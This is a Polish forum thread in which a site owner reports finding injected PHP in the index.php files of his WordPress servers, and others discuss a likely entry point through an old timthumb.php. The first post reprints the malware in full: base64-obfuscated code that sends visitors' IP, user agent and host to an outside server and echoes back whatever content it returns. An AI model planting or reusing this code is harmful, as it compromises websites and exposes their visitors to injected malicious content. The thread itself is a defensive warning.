Zostałem Zaatakowany

[papieros]

No i mnie się nie upiekło, przykleił mi się oto taki kod w index.php

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics		   
    $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
	    @$stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
   curl_close($stCurlHandle);
}
}
?>

Genruje toto jakiegoś trojana na stronie i przykeleja się UWAGA!!! do wszystkich (niekoniecznie wordpressowych) plików index.php w katalogu głównym i podkatalogach pierwszego poziomu zaraz za pierwszym kodem php w pliku.

Przyczepiło mi się do dwóch serwerów (sic!!!), na których postawionych jest kilka wordpressów (niestety różne wersje), prawdopodobnie wlazło albo przez jakąś starą wersję WP albo przez którąś z wtyczek lub templatów.

Ponieważ u mnie to wystąpiło na dwóch serwerach, radzę przejrzeć swoje strony. Uwaga, trojan wygenerowany przez ten kod, był widoczny tylko na jednej stronie, a więc jego obecność może być niezauważalna przez zerknięcie w sam html, trzeba zajrzeć do php.

Może jak ktoś znajdzie też u siebie ten kod, to wspólnie, porównując wersje WP i zainstalowane dodatki, postaramy się namierzyć którędy to draństwo włazi.

PS. Sprawa w miarę świeża, u mnie pliki zostały zmodyfikowane 25.11.2012 o 17:01

[Cossack]

Witam,

to chyba ten sam problem, jak ten opisany TU.

Pozdrawiam

[papieros]

Cossack, dzięki, tamten temat przeoczyłem.

Jakby co to, z tego co udało mi się wyszukać, jedną z możliwych przyczyn jest rzeczywiście stara wersja timthumb.php

Tu opis po angielsku: https://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

PS. ale pytanie, czy to jedyna dziura, ja u siebie tego timthumba nie widzę ... ale jeszcze szukam